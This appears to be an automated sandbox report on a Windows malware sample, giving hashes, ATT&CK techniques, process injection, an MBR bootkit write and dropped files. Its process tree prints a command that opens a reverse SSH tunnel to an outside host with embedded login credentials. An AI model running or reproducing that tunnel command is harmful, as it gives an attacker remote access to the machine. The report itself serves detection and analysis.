6270352f7c4380be8dc385a5cdfab6d9f7d1e1462ba7d073c744cdf0f02b1c96

General

Target

eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe
Size

730KB
MD5

eadc7ccc7032879c147cf3b214b9a663
SHA1

f4f4bd5c6737b15750adfdd36d95f223b88aea4f
SHA256

6270352f7c4380be8dc385a5cdfab6d9f7d1e1462ba7d073c744cdf0f02b1c96
SHA512

5b38a344f47392cba47b3d7d8a67eb5a606416b982f237d852547241d9bf9717591893bebce5b15e531e7381444b9eb207e76828b71c73c498296c5c868d57ca
SSDEEP

12288:i9UAnhPd6qmvCLAsShDHA8jgn7qkDBzYzEBODFkMO+EEuKmY0O7XlZHPyQtuMlCh:i9UAxd69K8NhDvY7q2Y75/uW57XLqQRq

Score

7^/10

bootkit persistence

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	alg.exe

Executes dropped EXE 5 IoCs

pid	Process
3172	alg.exe
4060	cssrs.exe
3888	System.exe
1004	cssrs.exe
3048	cssrs.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	cssrs.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4060 set thread context of 1004	4060	cssrs.exe	97
PID 1004 set thread context of 3048	1004	cssrs.exe	98

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4060	cssrs.exe
1004	cssrs.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 2052 wrote to memory of 3172	2052	eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe	87
PID 2052 wrote to memory of 3172	2052	eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe	87
PID 2052 wrote to memory of 3172	2052	eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe	87
PID 3172 wrote to memory of 4060	3172	alg.exe	90
PID 3172 wrote to memory of 4060	3172	alg.exe	90
PID 3172 wrote to memory of 4060	3172	alg.exe	90
PID 3172 wrote to memory of 3888	3172	alg.exe	92
PID 3172 wrote to memory of 3888	3172	alg.exe	92
PID 3172 wrote to memory of 3888	3172	alg.exe	92
PID 4060 wrote to memory of 1004	4060	cssrs.exe	97
PID 4060 wrote to memory of 1004	4060	cssrs.exe	97
PID 4060 wrote to memory of 1004	4060	cssrs.exe	97
PID 4060 wrote to memory of 1004	4060	cssrs.exe	97
PID 4060 wrote to memory of 1004	4060	cssrs.exe	97
PID 4060 wrote to memory of 1004	4060	cssrs.exe	97
PID 4060 wrote to memory of 1004	4060	cssrs.exe	97
PID 4060 wrote to memory of 1004	4060	cssrs.exe	97
PID 1004 wrote to memory of 3048	1004	cssrs.exe	98
PID 1004 wrote to memory of 3048	1004	cssrs.exe	98
PID 1004 wrote to memory of 3048	1004	cssrs.exe	98
PID 1004 wrote to memory of 3048	1004	cssrs.exe	98
PID 1004 wrote to memory of 3048	1004	cssrs.exe	98
PID 1004 wrote to memory of 3048	1004	cssrs.exe	98
PID 1004 wrote to memory of 3048	1004	cssrs.exe	98
PID 1004 wrote to memory of 3048	1004	cssrs.exe	98
PID 1004 wrote to memory of 3048	1004	cssrs.exe	98
PID 1004 wrote to memory of 3048	1004	cssrs.exe	98

C:\Users\Admin\AppData\Local\Temp\eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\eadc7ccc7032879c147cf3b214b9a663_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2052
- C:\Win.Msi\alg.exe
  "C:\Win.Msi\alg.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3172
- - C:\Win.Msi\cssrs.exe
    "C:\Win.Msi\cssrs.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4060
  - - C:\Win.Msi\cssrs.exe
      "C:\Win.Msi\cssrs.exe"
      4⤵
      Executes dropped EXE
      Writes to the Master Boot Record (MBR)
      Suspicious use of SetThreadContext
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1004
    - - C:\Win.Msi\cssrs.exe
        
        "C:\Win.Msi\cssrs.exe"
        5⤵
        Executes dropped EXE
        
        PID:3048
- - C:\Win.Msi\System.exe
    "C:\Win.Msi\System.exe" -ssh -R 32712:127.0.0.1:2103 thor.mine.nu -l thor -pw t4ct1cs
    3⤵
    - Executes dropped EXE
    PID:3888

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Pre-OS Boot

1

T1542

Bootkit

1

T1542.003

Privilege Escalation

Defense Evasion

Pre-OS Boot

1

T1542

Bootkit

1

T1542.003

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Win.Msi\3proxy.cfg

Filesize
132B

MD5
8342b622ca3ce4dc24dfe9d1d73aa231

SHA1
88ddbd474304e28a13f0b8b645074456cc78641b

SHA256
d5f2ef03c5a3d9affc5e7c0edca0ca887c5b15fa18a67e15b7982c2d8a741f55

SHA512
0f632515d0638110da4028553395495031b7405c1d8eb02b50312e076c5c8f3449ec6331559e43829fc0dbfbdee696448d04694e4e47ef985f580f9d4a093697

Download Submit
C:\Win.Msi\DiskDoctor.lnk

Filesize
494B

MD5
cfa161b8d3e17c3d1f40d21feb22d2be

SHA1
98e4adc779744f15d0b225f550b6d69e5fcadfff

SHA256
6b08344314ce52545ade0984a5b85ea22904b9bcf207fbd0ff645d360909e6b4

SHA512
c9a04ac1f7bf6ff71adc60fc2cadd85ac5f2b4bb8bd54bf46e962149a61f921562c7552ffbc3428fe706b573f0432dccf8f739c3719d8f4f577576f5fb3cac4c

Download Submit
C:\Win.Msi\System.exe

Filesize
323KB

MD5
f4bf5c28bed38e31c143abfb9bebb6d5

SHA1
015f3e7ce4ff406f712b4ee1c893edfaa9276259

SHA256
d79ffe88f41e98fdf29b6ee747519bb4bd546a572235dfdbd6962311455c6971

SHA512
72e6ed78e42d357447ada178956b9960784fd3cfc0268ede7d4a602e1f789585d90e5ef006070034a7a9b0f35afd39000eb7fa9f6c2d06f4bddce766b85bc935

Download Submit
C:\Win.Msi\alg.exe

Filesize
180KB

MD5
d89ad7d904e438ffa356e4bbfba92ab8

SHA1
a65c379010cd79f5fc1d744aa9231b9a99c8024b

SHA256
bfeb27b1c724b799a431200453a1ee04f26d485cf4c2cbe74786521d3ba7f9a2

SHA512
38282e6006e777806c08732f044bb32510abf4162178f7aedd4caf4eb541f5bdbc5b2409005d71cc47dc5e420dcae4acaa4fd0f68ad26178b1e0074e8f7c0a2c

Download Submit
C:\Win.Msi\cssrs.exe

Filesize
304KB

MD5
f30e9353181ad1d10385af8659820850

SHA1
0863abc64d553be5674852092a21375d0b1cea25

SHA256
a43fb5375b3cd531b59f33ac22a3b3d0202899a16b89dd29b1fc16e4b6ab2497

SHA512
01bab091941b47888498fc950451e90f2eb4be2ecab9b5132416f54eff5a3e76ac56fd3d387a579e6a365ca0f9f6ab8a2c55613b91b6fd0e8ef88927385543a9

Download Submit
memory/1004-34-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1004-26-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1004-29-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/3048-51-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/3048-49-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/3048-32-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/3048-39-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/3048-67-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/3048-41-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/3048-43-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/3048-45-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/3048-47-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/3048-37-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/3048-65-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/3048-53-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/3048-55-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/3048-57-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/3048-59-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/3048-61-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/3048-63-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/3172-40-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/3888-25-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads